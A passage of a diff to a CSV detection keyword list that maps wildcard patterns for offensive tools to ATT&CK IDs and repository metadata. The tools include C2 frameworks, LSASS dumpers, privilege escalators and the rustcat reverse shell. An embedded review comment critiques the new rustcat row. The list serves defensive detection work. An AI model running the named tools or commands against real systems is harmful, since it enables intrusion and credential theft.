Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run shellcode_exec*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Run the krbscm method for SYSTEM shell*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*run thief:latest*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - 
TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*run_ppl_dump_exploit*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*run_ppl_medic_exploit*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*run_server.bat","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*run_server.bat","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*runasadmin uac-cmstplua*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*runasadmin uac-token-duplication*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*RunasCreateProcessAsUserW*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" 
@@ -16044,21 +16225,21 @@ "*RunasCs_net2.exe*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*RunasCsMain*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*RunasCs-master*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" -"*runas-netonly *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*runasppl_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 
- TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*runas-netonly *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*runasppl_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*RunAsWinTcb.exe*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*RunAsWinTcb-master*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*RunCleanup-77740706-9DEC-EC11-BB3D-0022482CA4A7.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" "*RunCodeExec-75740706-9DEC-EC11-BB3D-0022482CA4A7.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" -"*run-dll SharpSploit*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*rundll32 charlotte.dll*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*run-dll SharpSploit*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*rundll32 charlotte.dll*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*rundll32.exe agressor.dll*dec*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" "*RunDLL32JSStager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*Run-EXEonRemote*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Run-EXEonRemote*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*RunExfil-78740706-9DEC-EC11-BB3D-0022482CA4A7.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" "*runFakeTerminal*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" -"*Running final exploit packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*running SharpHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"*Running final exploit packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*running SharpHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "*RunOF.exe -*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*RunOF.Internals*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*RunRansomware-76740706-9DEC-EC11-BB3D-0022482CA4A7.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" 
@@ -16073,6 +16254,7 @@ "*RuralBishop.sln*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" "*RuralBishop-master*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" "*rustbof.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" +"*rustcat-3.0.0.zip*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" "*rusthound * --zip --ldaps --adcs --old-bloodhound*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*rusthound *--domain*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" "*rusthound *--ldapfqdn *","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" 
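Review bot: The added rustcat row keys on a single release archive name, `*rustcat-3.0.0.zip*`, so a download of any other release will not match it even though both detection columns are enabled (`"1","1"`). Unless a row outside this hunk already covers the tool, a version-independent keyword such as `*rustcat-*.zip*` or `*robiot/rustcat*` would keep the entry useful after the next upstream release. The ATT&CK columns of the same row also look inconsistent: T1046 is a Discovery technique but TA0007 is not listed, while TA0009 and TA0040 are listed without any technique from those tactics. For a tool described as a port listener and reverse shell, something like `T1059 - T1095 - T1571` with `TA0002 - TA0011` seems closer than T1090.x (Proxy), but that should be confirmed against how other reverse-shell entries in this file are tagged.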
@@ -16082,8 +16264,8 @@ "*RustHound-main*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" "*rvazarkar/GMSAPasswordReader*","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","103","23","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" "*Rvn0xsy/Cooolis-ms*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
